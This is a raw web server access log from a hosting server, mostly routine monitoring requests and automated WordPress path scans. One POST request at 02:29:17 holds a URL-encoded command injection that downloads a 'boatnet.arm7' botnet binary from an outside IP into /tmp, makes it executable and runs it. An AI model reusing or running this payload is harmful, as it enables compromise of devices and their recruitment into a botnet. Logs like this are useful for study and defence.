127.0.0.1 - - [16/Jun/2025:01:45:08 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1457 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:01:45:14 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1456 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [16/Jun/2025:01:45:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
::1 - - [16/Jun/2025:01:45:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:01:45:25 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1458 "-" "munin/2.0.73 (libwww-perl/6.67)"
209.74.73.66 - - [16/Jun/2025:01:45:34 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:01:46:06 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [16/Jun/2025:01:46:12 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:01:46:15 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [16/Jun/2025:01:46:44 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [16/Jun/2025:01:46:48 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
127.0.0.1 - - [16/Jun/2025:01:48:00 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.177.126.50 - - [16/Jun/2025:01:48:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:01:48:29 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:01:49:07 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:50:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41172 "-" "-"
127.0.0.1 - - [16/Jun/2025:01:50:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1455 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:01:50:09 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1456 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:01:50:15 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:01:50:18 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1455 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [16/Jun/2025:01:51:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:01:51:24 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:01:52:03 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:53:15 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
209.74.73.66 - - [16/Jun/2025:01:54:19 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:01:54:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:01:54:58 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:55:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41219 "-" "-"
127.0.0.1 - - [16/Jun/2025:01:55:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1457 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:01:55:10 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1458 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:01:55:15 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:01:55:19 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1458 "-" "munin/2.0.73 (libwww-perl/6.67)"
209.74.73.66 - - [16/Jun/2025:01:57:14 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:01:57:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:01:57:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:00:02 +0000] "GET /whm-server-status HTTP/1.0" 200 41267 "-" "-"
204.76.203.219 - - [16/Jun/2025:02:00:04 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
127.0.0.1 - - [16/Jun/2025:02:00:07 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1457 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:02:00:07 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
209.74.73.66 - - [16/Jun/2025:02:00:09 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:00:11 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1457 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:02:00:17 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:02:00:19 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1454 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [16/Jun/2025:02:00:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:02:00:50 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:02:03:04 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:02:03:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
43.156.168.214 - - [16/Jun/2025:02:03:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
2a06:98c0:3600::103 - - [16/Jun/2025:02:03:36 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [16/Jun/2025:02:03:45 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:02:04:48 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
127.0.0.1 - - [16/Jun/2025:02:05:01 +0000] "GET /whm-server-status HTTP/1.0" 200 40986 "-" "-"
127.0.0.1 - - [16/Jun/2025:02:05:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1461 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:02:05:08 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1458 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:02:05:13 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:02:05:15 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1461 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:02:05:16 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.177.126.50 - - [16/Jun/2025:02:05:42 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:02:05:57 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.74.73.66 - - [16/Jun/2025:02:05:59 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:02:06:16 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [16/Jun/2025:02:06:41 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:02:08:40 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:02:08:58 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:02:09:27 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:10:02 +0000] "GET /whm-server-status HTTP/1.0" 200 40797 "-" "-"
127.0.0.1 - - [16/Jun/2025:02:10:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1453 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:02:10:08 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1453 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:02:10:11 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:02:10:13 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1453 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:02:10:26 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
185.242.226.152 - - [16/Jun/2025:02:11:36 +0000] "\x16\x03\x01" 400 10073 "-" "-"
198.177.126.50 - - [16/Jun/2025:02:11:38 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:02:11:56 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:02:12:26 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:02:14:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:02:14:55 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:15:01 +0000] "GET /whm-server-status HTTP/1.0" 200 40636 "-" "-"
127.0.0.1 - - [16/Jun/2025:02:15:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1455 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:02:15:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1455 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:02:15:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:02:15:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1455 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.54.118.134 - - [16/Jun/2025:02:15:25 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:16:07 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.177.126.50 - - [16/Jun/2025:02:17:32 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:02:17:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:02:18:24 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:20:01 +0000] "GET /whm-server-status HTTP/1.0" 200 40574 "-" "-"
127.0.0.1 - - [16/Jun/2025:02:20:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1369 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:02:20:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1369 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:02:20:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:02:20:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1371 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [16/Jun/2025:02:20:29 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:02:20:52 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:21:19 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.54.118.134 - - [16/Jun/2025:02:21:23 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
154.212.141.231 - - [16/Jun/2025:02:21:41 +0000] "GET / HTTP/1.1" 200 163 "https://93.89.5.184:2096" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
154.212.141.231 - - [16/Jun/2025:02:21:41 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 200 6964 "http://154.223.157.97:60000" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
118.26.36.34 - - [16/Jun/2025:02:21:42 +0000] "GET / HTTP/1.1" 200 163 "http://89.116.75.57:60000" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
154.212.141.231 - - [16/Jun/2025:02:21:42 +0000] "GET /cgi-sys/favicon.ico HTTP/1.1" 404 10131 "http://www.server1.ngambekcore.com" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
118.26.36.34 - - [16/Jun/2025:02:21:43 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 200 6974 "http://156.235.30.81:60000" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
154.212.141.231 - - [16/Jun/2025:02:21:44 +0000] "GET /favicon.ico HTTP/1.1" 404 10115 "http://www.server1.ngambekcore.com" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
118.26.36.34 - - [16/Jun/2025:02:21:45 +0000] "GET /cgi-sys/favicon.ico HTTP/1.1" 404 10134 "http://mail.server1.ngambekcore.com" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
118.26.36.34 - - [16/Jun/2025:02:21:46 +0000] "GET /favicon.ico HTTP/1.1" 404 10118 "http://mail.server1.ngambekcore.com" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
149.50.103.48 - - [16/Jun/2025:02:21:57 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
180.149.126.7 - - [16/Jun/2025:02:22:50 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
43.163.3.40 - - [16/Jun/2025:02:23:13 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.177.126.50 - - [16/Jun/2025:02:23:25 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
172.105.128.11 - - [16/Jun/2025:02:23:46 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.74.73.66 - - [16/Jun/2025:02:23:51 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:02:23:53 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [16/Jun/2025:02:24:22 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:25:02 +0000] "GET /whm-server-status HTTP/1.0" 200 41590 "-" "-"
127.0.0.1 - - [16/Jun/2025:02:25:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1452 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:02:25:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1453 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:02:25:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:02:25:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1454 "-" "munin/2.0.73 (libwww-perl/6.67)"
2a06:98c0:3600::103 - - [16/Jun/2025:02:25:22 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.177.126.50 - - [16/Jun/2025:02:26:22 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:26:25 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
2a06:98c0:3600::103 - - [16/Jun/2025:02:26:30 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.74.73.66 - - [16/Jun/2025:02:26:50 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:02:27:20 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [16/Jun/2025:02:27:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
144.172.116.95 - - [16/Jun/2025:02:29:17 +0000] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1" 404 10499 "-" "Mozilla/5.0"
198.177.126.50 - - [16/Jun/2025:02:29:19 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:02:29:48 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
152.42.188.106 - - [16/Jun/2025:02:29:55 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:55 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:55 +0000] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 10102 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:55 +0000] "GET /xmlrpc.php?rsd HTTP/1.1" 404 10076 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:56 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:56 +0000] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:56 +0000] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10110 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:56 +0000] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10122 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:56 +0000] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:57 +0000] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10108 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:57 +0000] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:57 +0000] "GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:57 +0000] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:57 +0000] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:58 +0000] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10110 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:58 +0000] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:58 +0000] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10110 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:58 +0000] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:58 +0000] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10110 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
152.42.188.106 - - [16/Jun/2025:02:29:58 +0000] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
127.0.0.1 - - [16/Jun/2025:02:30:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41098 "-" "-"
127.0.0.1 - - [16/Jun/2025:02:30:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1452 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:02:30:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1452 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:02:30:06 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:02:30:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.54.118.134 - - [16/Jun/2025:02:30:20 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:32:10 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.177.126.50 - - [16/Jun/2025:02:32:15 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:02:32:47 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:02:33:19 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:35:02 +0000] "GET /whm-server-status HTTP/1.0" 200 40972 "-" "-"
127.0.0.1 - - [16/Jun/2025:02:35:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1453 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:02:35:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1453 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:02:35:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:02:35:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1453 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [16/Jun/2025:02:35:12 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:02:35:46 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
